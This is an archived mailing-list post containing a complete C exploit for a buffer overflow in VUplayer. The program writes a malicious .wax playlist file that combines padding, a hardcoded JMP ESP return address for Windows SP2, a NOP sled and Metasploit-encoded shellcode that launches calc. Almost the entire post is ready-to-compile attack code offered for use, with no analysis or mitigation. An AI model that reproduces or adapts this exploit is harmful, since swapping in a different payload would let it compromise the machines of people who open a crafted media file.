VUplayer (.wax file) local buffer overflow crash exploit

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



/*      VUplayer (.wax file) local buffer overflow crash exploit
*       By Assad edin - Moroccan Hackerz ( Mgharba Until Death ) - Storms0uth@xxxxxxxxxxx
*       Mgharba Bhjawa Msalmine : xCracker - Assad edin - Simo-s0ft .
*       Special Thanks: All Moroccan & Muslims Hackers & Str0ke Ro7 T9Awd CHof li I7wik.
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
// unicode format
char header1[]=
"\x3c\x77\x61\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22"
"\x33\x2e\x30\x22\x20\x3e\x0d\x0d\x0d\x3c\x65\x6e\x74\x72\x79\x3e"
"\x0d\x0d\x0d\x3c\x74\x69\x74\x6c\x65\x3e\x43\x6f\x64\x65\x64\x20"
"\x42\x79\x20\x53\x69\x6d\x4f\x2d\x73\x30\x66\x54\x2e\x6d\x70\x33"
"\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0d\x0d\x0d\x3c\x72\x65\x66\x20"
"\x68\x72\x65\x66\x20\x3d\x09";



//win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a";

char header2[]=
"\x2f\x3e\x0d\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x3c\x2f\x77\x61"
"\x78\x3e";

int main(int argc,char *argv[])
{   FILE *openfile;
char exploit[1290];
char junk[925];
char ret[]="\x68\xD5\x85\x7C";// JMP kernel32.dll esp (Windows Trust SP2)
char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
printf(" CoDEd By Ismail ==> marrakesh city");

memset(junk,0x41,925);
memcpy(exploit,junk,925);
memcpy(exploit+925,ret,strlen(ret));
memcpy(exploit+925+strlen(ret),nop,strlen(nop));
memcpy(exploit+925+strlen(ret)+strlen(nop),scode,343);

openfile=fopen("ismail.wax","wb");
if(openfile==NULL){               perror("ERROR....\n");}
fputs(header1,openfile);
fputs(exploit,openfile);
fputs(header2,openfile);
fclose(openfile);
printf("File created .....!"
             "open it whit VUplayer..!");
return 0;
}



[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux